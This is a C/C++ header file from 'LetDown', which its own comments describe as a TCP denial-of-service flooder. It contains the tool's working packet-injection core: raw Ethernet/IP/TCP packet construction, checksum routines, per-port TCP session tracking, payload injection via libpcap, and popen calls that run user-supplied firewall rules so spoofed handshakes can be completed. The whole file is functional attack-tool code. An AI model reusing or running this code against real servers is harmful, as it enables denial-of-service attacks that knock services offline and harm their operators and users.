/*
 * INJECT.H
 * Packet injection functions...
 *
 * LetDown, tcp dos flooder. Raw 3 way handshake...
 * See http://insecure.org/stf/tcp-dos-attack-explained.html
 *
 * Copyright (C) 2009  Acri Emanuele <crossbower@gmail.com>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#ifndef __INJECT_H__
#define __INJECT_H__

#include <pcap.h>

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <signal.h>
#include <stdint.h>

#include <sys/wait.h>

#include <map>

#include "get_ip_mac.h"

#define PKT_LEN 8192
#define ETHER_ADDR_LEN 6

// pcap stuff
pcap_t *handle;
struct bpf_program fp;

/*
 * TCP stream informations
 */
struct tcp_session {

    int active;

    /* TCP stuff */
    uint16_t tcp_sport;   /* Our port */
    uint32_t tcp_seq;     /* TCP sequence number */
    uint32_t tcp_ack;     /* TCP ack number */
    uint32_t host_seq;    /* Target sequence number */
    uint32_t host_ack;    /* Target ack number */

    uint16_t payload_len; /* Payload len */

    int count;             /* counter for multistage payloads */
};

// Key type for tcp session map
typedef uint16_t sess_key;

// map of tcp sessions
std::map <sess_key, struct tcp_session> sess_map;

// ip id
uint16_t ipid=1;

// destination and source mac addresses
uint8_t dmac[ETHER_ADDR_LEN];
uint8_t smac[ETHER_ADDR_LEN];

// packet buffer (used to optimize packet injection)
int packet_buffer_initialized = 0;
uint8_t packet_buffer[PKT_LEN];

/*
 * Ethernet header
 */
struct sniff_ethernet {
        uint8_t  ether_dhost[ETHER_ADDR_LEN];  /* destination host address */
        uint8_t  ether_shost[ETHER_ADDR_LEN];  /* source host address */
        uint16_t ether_type;                   /* IP? ARP? RARP? etc */
};
#define SIZE_ETHERNET 14

/*
 * IP header
 */
struct sniff_ip {
        uint8_t  ip_vhl;                /* version << 4 | header length >> 2 */
        uint8_t  ip_tos;                /* type of service */
        uint16_t ip_len;                /* total length */
        uint16_t ip_id;                 /* identification */
        uint16_t ip_off;                /* fragment offset field */
        #define IP_RF 0x8000            /* reserved fragment flag */
        #define IP_DF 0x4000            /* dont fragment flag */
        #define IP_MF 0x2000            /* more fragments flag */
        #define IP_OFFMASK 0x1fff       /* mask for fragmenting bits */
        uint8_t  ip_ttl;                /* time to live */
        uint8_t  ip_p;                  /* protocol */
        uint16_t ip_sum;                /* checksum */
        in_addr_t ip_src,ip_dst;        /* source and dest address */
};
#define IP_HL(ip)               (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)                (((ip)->ip_vhl) >> 4)

/*
 * TCP header
 */
struct sniff_tcp {
        uint16_t th_sport;            /* source port */
        uint16_t th_dport;            /* destination port */
        uint32_t th_seq;              /* sequence number */
        uint32_t th_ack;              /* acknowledgement number */
        uint8_t  th_offx2;            /* data offset, rsvd */
#define TH_OFF(th)      (((th)->th_offx2 & 0xf0) >> 4)
        uint8_t th_flags;
        #define TH_FIN  0x01
        #define TH_SYN  0x02
        #define TH_RST  0x04
        #define TH_PUSH 0x08
        #define TH_ACK  0x10
        #define TH_URG  0x20
        #define TH_ECE  0x40
        #define TH_CWR  0x80
        #define TH_FLAGS        (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR)
        uint16_t th_win;              /* window */
        uint16_t th_sum;              /* checksum */
        uint16_t th_urp;              /* urgent pointer */
};

/*
 * Basic packet structure
 */
#pragma pack (1)
struct basic_packet {
    struct sniff_ethernet eth;  /* ethernet header */
    struct sniff_ip ip;         /* ip header */
    struct sniff_tcp tcp;       /* tcp header */
};

#define SIZE_BASIC_PACKET sizeof(struct basic_packet)

/*
 * Enable firewall rule
 */
void firewall_on()
{
    FILE *p;

    if(progopt.firewall[0]) {
        p = popen(progopt.firewall[0], "r");
        pclose(p);
    }
}

/*
 * Disable firewall rule
 */
void firewall_off()
{
    FILE *p;

    if(progopt.firewall[1]) {
        p = popen(progopt.firewall[1], "r");
        pclose(p);
    }
}

/*
 * Initialize new session
 */
void init_new_session(uint16_t sport)
{
    struct tcp_session tcpsess;
    sess_key keyhash;

    memset(&tcpsess, 0, sizeof(tcpsess));

    // calc key for sess_map
    keyhash = sport;

    // fill session struct
    sess_map[keyhash].tcp_sport = sport;
    sess_map[keyhash].active = 1;
}

/*
 * Libpcap initialize
 */
int pcap_initialize(char *pcap_errbuf, uint32_t *net, uint32_t *mask)
{
    char *dev;
    unsigned int temp[6], i;

    // find a device if not specified
    if(!progopt.device) {
        dev = pcap_lookupdev(pcap_errbuf);
        if (dev == NULL) {
            return 0;
        }
    }
    else {
        dev = progopt.device;
    }

    // get network number and mask associated with capture device
    if(pcap_lookupnet(dev, net, mask, pcap_errbuf) == -1) {
        return 0;
    }

    // extract and save destination mac address
    sscanf(progopt.dstmac, "%02x:%02x:%02x:%02x:%02x:%02x", &temp[0], &temp[1], &temp[2], &temp[3], &temp[4], &temp[5]);
    for (i = 0; i<6; i++) dmac[i] = (uint8_t) temp[i];

    // if source mac address is provided
    if (progopt.srcmac) {
        sscanf(progopt.srcmac, "%02x:%02x:%02x:%02x:%02x:%02x", &temp[0], &temp[1], &temp[2], &temp[3], &temp[4], &temp[5]);
        for (i = 0; i<6; i++) smac[i] = (uint8_t) temp[i];
    }

    // else try to automatically get source mac
    else {
        if(!if_mac_address(dev, (char *) smac)) {
            sprintf(pcap_errbuf, "Retrieving the source MAC address failed: provide it with the options.\n");
            return 0;
        }
    }

    // try to automatically get the source ip
    if(!progopt.srcaddr) {

        progopt.srcaddr = (char *) malloc(NI_MAXHOST+1);
        
        if(!if_ip_address(dev, progopt.srcaddr)) {
            sprintf(pcap_errbuf, "Retrieving the source IP address failed: provide it with the options.\n");
            return 0;
        }

        progopt.srcip = inet_addr(progopt.srcaddr);

    }

    // open capture device
    handle = pcap_open_live(dev, PKT_LEN, 1, progopt.time, pcap_errbuf);
    if (handle == NULL) {
        return 0;
    }

    return 1;
}

/*
 * Libpcap install filter
 */
int pcap_install_filter(char *pcap_errbuf, uint32_t *net, uint32_t *mask)
{
    char filter_exp[MAX_ARG];

    // prepare the filter expression
    if(!progopt.srcaddr) {
        sprintf(filter_exp,
                "tcp and src host %s and src port %d",
                progopt.dstaddr, progopt.dport);
    }
    else {
        sprintf(filter_exp,
                "tcp and src host %s and src port %d and dst host %s",
                progopt.dstaddr, progopt.dport, progopt.srcaddr);
    }

    // compile the filter expression
    if (pcap_compile(handle, &fp, filter_exp, 0, *net) == -1) {
        strncpy(pcap_errbuf, pcap_geterr(handle), PCAP_ERRBUF_SIZE);
        return 0;
    }

    // apply the compiled filter
    if (pcap_setfilter(handle, &fp) == -1) {
        strncpy(pcap_errbuf, pcap_geterr(handle), PCAP_ERRBUF_SIZE);
        return 0;
    }

    return 1;
}

/*
 * Checksum IP
 */
uint16_t ip_cksum (uint16_t *buff, size_t len) {
    
    uint32_t sum = 0;
    uint16_t answer = 0;

    while(len > 1) {
        sum += *buff++;
        len -= 2;
    }

    if (len) {
        sum += * (uint8_t *) buff;
    }

    while (sum>>16)
        sum = (sum & 0xffff) + (sum >> 16);

    answer = ~sum;

    return(answer);
}

/*
 * Checksum TCP
 */
uint16_t tcp_cksum(uint16_t *src_addr, uint16_t *dest_addr, uint16_t *buff, uint16_t len) {

    uint32_t sum = 0;
    uint16_t answer = 0;

    sum += src_addr[0];
    sum += src_addr[1];
    
    sum += dest_addr[0];
    sum += dest_addr[1];

    sum += htons(0x6);

    sum += htons(len);

    while(len > 1) {
        sum += *buff++;
        len -= 2;
    }

    if (len) {
        sum += * (uint8_t *) buff;
    }

    while (sum>>16)
        sum = (sum & 0xffff) + (sum >> 16);

    answer = ~sum;

    return(answer);
}

/*
 * Checksum UDP
 */
uint16_t udp_cksum(uint16_t *src_addr, uint16_t *dest_addr, uint16_t *buff, size_t len) {
   
    uint32_t sum = 0;
    uint16_t answer = 0;
    
    sum += src_addr[0];
    sum += src_addr[1];
    
    sum += dest_addr[0];
    sum += dest_addr[1];

    sum += htons(0x11);

    sum += htons(len);

    while(len > 1) {
        sum += *buff++;
        len -= 2;
    }

    if (len) {
        sum += * (uint8_t *) buff;
    }

    while (sum>>16)
        sum = (sum & 0xffff) + (sum >> 16);

    answer = ~sum;

    return(answer);
}

/*
 * Do checksum (if the packet requires it...)
 */
void do_cksum (char *raw, size_t size) {
    
    uint16_t *cksum = NULL;

    // is ip?
    if ( size >= 34 && raw[12]==0x08  && raw[13]==0x00  ) {
       
        // ip checksum
        cksum = (uint16_t *) &raw[24];
        *cksum = 0;

        *cksum = ip_cksum((uint16_t *) &raw[14], 20);

        // next protocol
        switch(raw[23]) {

            // tcp
            case 0x06:
                if (size < 54) return; // size check
                cksum = (uint16_t *) &raw[50];
                *cksum = 0;
                *cksum = tcp_cksum((uint16_t *) &raw[26], (uint16_t *) &raw[30], (uint16_t *) &raw[34], (size-34));
                break;

            // udp
            case 0x11:
                if (size < 42) return; // size check
                cksum = (uint16_t *) &raw[40];
                *cksum = 0;
                *cksum = udp_cksum((uint16_t *) &raw[26], (uint16_t *) &raw[30], (uint16_t *) &raw[34], (size-34));
                break;

            // icmp
            case 0x01:
                if (size < 42) return; // size check
                cksum = (uint16_t *) &raw[36];
                *cksum = 0;
                *cksum = ip_cksum((uint16_t *) &raw[34], (size-34));
                break;
        }
    }
}

/*
 * Adjust packet size fields (if the packet requires it...)
 */
void do_size (char *raw, size_t size) {
    
    uint16_t *len_field = NULL;

    // is ip?
    if ( size >= 34 && raw[12]==0x08  && raw[13]==0x00  ) {
       
        // ip total length
        len_field = (uint16_t *) &raw[16];

        *len_field = size - 14; // size - ethernet header
        *len_field = htons(*len_field);

        // next protocol
        switch(raw[23]) {

            // tcp
            case 0x06:
                if (size < 54) return; // size check
                // tcp uses header length field
                break;

            // udp
            case 0x11:
                if (size < 42) return; // size check
                len_field = (uint16_t *) &raw[38];
                *len_field = size - 14 - ((raw[14] & 0xF) * 4); // size - ethernet header - ip header
                *len_field = htons(*len_field);
                break;

            // icmp
            case 0x01:
                if (size < 42) return; // size check
                // no size field
                break;
        }
    }
}

/*
 * Inject a raw buffer to the network
 */
int inject_raw(pcap_t *fp, char *raw, size_t size) {
	int err = 0;

    /* packet size (if enabled) */
    do_size (raw, size);

    /* checksum */
    do_cksum (raw, size);

	/* Send down the packet */
	err = pcap_sendpacket(fp, (unsigned char *) raw, size);

	return err;
}

/*
 * Prepare Ethernet header
 */
void prep_ethernet_header(struct basic_packet *packet)
{
    memcpy(packet->eth.ether_dhost, dmac, ETHER_ADDR_LEN); /* destination host address */
    memcpy(packet->eth.ether_shost, smac, ETHER_ADDR_LEN); /* source host address */
    packet->eth.ether_type  = htons(0x0800); /* IP */
}

/*
 * Prepare IP header
 */
void prep_ip_header(struct basic_packet *packet)
{
    packet->ip.ip_vhl = 0x45;          /* version 4, header length 20 bytes */
    packet->ip.ip_id  = htons(ipid++); /* identification */
    packet->ip.ip_ttl = 0x40;          /* time to live 60 */
    packet->ip.ip_p   = 0x06;          /* protocol tcp */
    packet->ip.ip_src = progopt.srcip; /* source ip */
    packet->ip.ip_dst = progopt.dstip; /* dest ip */
}

/*
 * Prepare TCP header
 */
void prep_tcp_header(struct basic_packet *packet, uint16_t sport, uint32_t seq, uint32_t ack, uint8_t flags, uint16_t window)
{
    packet->tcp.th_sport = htons(sport);         /* source port */
    packet->tcp.th_dport = htons(progopt.dport); /* destination port */
    packet->tcp.th_seq   = htonl(seq);           /* sequence number */
    packet->tcp.th_ack   = htonl(ack);           /* acknowledgement number */
    packet->tcp.th_offx2 = 0x50;                 /* data offset, rsvd */
    packet->tcp.th_flags = flags;                /* flags */
    packet->tcp.th_win   = htons(window);        /* window */
}

/*
 * Modify already prepared headers
 */
inline void update_headers(struct basic_packet *packet, uint16_t sport, uint32_t seq, uint32_t ack, uint8_t flags, uint16_t window)
{
    packet->ip.ip_id  = htons(ipid++);      /* identification */
    packet->tcp.th_sport = htons(sport);    /* source port */
    packet->tcp.th_seq   = htonl(seq);      /* sequence number */
    packet->tcp.th_ack   = htonl(ack);      /* acknowledgement number */
    packet->tcp.th_flags = flags;           /* flags */
    packet->tcp.th_win   = htons(window);   /* window */
}

/*
 * Inject TCP packet without using session map
 */
int inject_tcp_packet(uint16_t sport, uint32_t seq, uint32_t ack, uint8_t flags, uint16_t window)
{
    struct basic_packet *packet = (struct basic_packet *) packet_buffer;
    
    // initialize the packet buffer (only the first time)
    if (!packet_buffer_initialized) {
        memset(packet_buffer, 0, sizeof(packet_buffer));

        // prepare packet: Ethernet header 
        prep_ethernet_header(packet);
    
        // prepare packet: IP header
        prep_ip_header(packet);

        // prepare packet: TCP header
        prep_tcp_header(packet, sport, seq, ack, flags, window);

        packet_buffer_initialized = 1;
    }

    // modify already initialized packet buffer
    else {
        // update packet headers
        update_headers(packet, sport, seq, ack, flags, window);
    }
  
    return inject_raw(handle, (char *) packet, sizeof(struct basic_packet));
}

/*
 * Inject 'normal' TCP packet
 */
int inject_tcp_packet(sess_key keyhash, uint8_t flags, uint16_t window)
{
    struct basic_packet *packet = (struct basic_packet *) packet_buffer;
    
    // initialize the packet buffer (only the first time)
    if (!packet_buffer_initialized) {
        memset(packet_buffer, 0, sizeof(packet_buffer));

        // prepare packet: Ethernet header 
        prep_ethernet_header(packet);
    
        // prepare packet: IP header
        prep_ip_header(packet);

        // prepare packet: TCP header
        prep_tcp_header(packet, sess_map[keyhash].tcp_sport, sess_map[keyhash].tcp_seq, sess_map[keyhash].tcp_ack, flags, window);

        packet_buffer_initialized = 1;
    }

    // modify already initialized packet buffer
    else {
        // update packet headers
        update_headers(packet, sess_map[keyhash].tcp_sport, sess_map[keyhash].tcp_seq, sess_map[keyhash].tcp_ack, flags, window);
    }
  
    return inject_raw(handle, (char *) packet, sizeof(struct basic_packet));
}

/*
 * Inject TCP packet with payload
 */
int inject_tcp_packet(sess_key keyhash, char *payload, uint8_t flags, uint16_t window)
{
    struct basic_packet *packet = (struct basic_packet *) packet_buffer;
    char *data = (char *) (packet_buffer + sizeof(struct basic_packet));
    int totlen = sizeof(struct basic_packet) + strlen(payload);
    
    // initialize the packet buffer (only the first time)
    if (!packet_buffer_initialized) {
        memset(packet_buffer, 0, sizeof(packet_buffer));

        // prepare packet: Ethernet header 
        prep_ethernet_header(packet);
    
        // prepare packet: IP header
        prep_ip_header(packet);

        // prepare packet: TCP header
        prep_tcp_header(packet, sess_map[keyhash].tcp_sport, sess_map[keyhash].tcp_seq, sess_map[keyhash].tcp_ack, flags, window);

        // write payload
        strncpy(data, payload, strlen(payload));

        packet_buffer_initialized = 1;
    }

    // modify already initialized packet buffer
    else {
        // update packet headers
        update_headers(packet, sess_map[keyhash].tcp_sport, sess_map[keyhash].tcp_seq, sess_map[keyhash].tcp_ack, flags, window);

        // write payload
        strncpy(data, payload, strlen(payload));
    }
  
    return inject_raw(handle, (char *) packet, totlen);
}

#endif /* __INJECT_H__ */
